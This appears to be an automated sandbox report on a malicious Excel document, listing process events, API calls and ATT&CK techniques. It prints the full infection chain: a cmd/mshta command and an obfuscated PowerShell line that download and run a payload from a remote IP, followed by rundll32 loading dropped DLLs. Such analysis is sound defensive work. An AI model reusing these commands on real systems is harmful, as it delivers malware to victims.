                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exe TID: 2552Thread sleep time: -360000s >= -30000s
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                            Source: rundll32.exe, 0000000C.00000002.509950436.00000000002AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                            Source: rundll32.exe, 0000000E.00000002.559655343.000000000032A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0035BAEA FindFirstFileW,
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002CD374 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0082C774 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0074D374 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061D374 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AD374 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028D374 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0035D374 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                            HIPS / PFW / Operating System Protection Evasion

                            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 74.207.230.120 144
                            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 139.196.72.155 144
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo %ooo% "
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/ee/ss/se.html
                            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat
                            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\Milossd.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",RIBFxhGufP
                            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",RPzUMBQVQiRJfbr
                            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",DllRegisterServer
                            Source: Yara match | File source: DOCUMENT_2801.xls, type: SAMPLE
                            Source: Yara match | File source: C:\Users\user\Desktop\DOCUMENT_2801.xls, type: DROPPED
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetThreadLocale,GetLocaleInfoA,GetACP,
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetThreadLocale,GetLocaleInfoA,GetACP,
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,
                            Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_1003DAA7 cpuid
                            Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA,

                            Stealing of Sensitive Information

                            Source: Yara match | File source: C:\ProgramData\Milossd.dll, type: DROPPED
                            ATT&CK matrix, listed per tactic column (the leading digits reproduce the count badges shown in each matrix cell):
                            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                            Execution: 21 Scripting; 1 Native API; 13 Exploitation for Client Execution; 11 Command and Scripting Interpreter; 1 Service Execution; 1 PowerShell; Scheduled Task; Command and Scripting Interpreter; PowerShell
                            Persistence: 1 Windows Service; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
                            Privilege Escalation: 1 Windows Service; 111 Process Injection; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
                            Defense Evasion: 2 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 21 Scripting; 2 Obfuscated Files or Information; 2 Masquerading; 1 Virtualization/Sandbox Evasion; 111 Process Injection; 1 Hidden Files and Directories; 1 Rundll32
                            Credential Access: 1 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                            Discovery: 2 System Time Discovery; 3 File and Directory Discovery; 38 System Information Discovery; 21 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 1 Remote System Discovery; System Network Connections Discovery
                            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
                            Collection: 1 Archive Collected Data; 1 Email Collection; 1 Input Capture; 1 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                            Command and Control: 13 Ingress Tool Transfer; 1 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 122 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                            Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
                            Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
                            Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction
                            Behavior Graph ID: 562416 | Sample: DOCUMENT_2801.xls | Startdate: 28/01/2022 | Architecture: WINDOWS | Score: 100

                            Sample-level graph nodes:
                            • 210.57.209.142 UNAIR-AS-ID Universitas Airlangga ID (Indonesia)
                            • 118.98.72.86 TELKOMNET-AS-AP PT Telekomunikasi Indonesia ID (Indonesia)
                            • 29 other IPs or domains
                            • Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                            • Multi AV Scanner detection for domain / URL
                            • Found malware configuration
                            • 17 other signatures

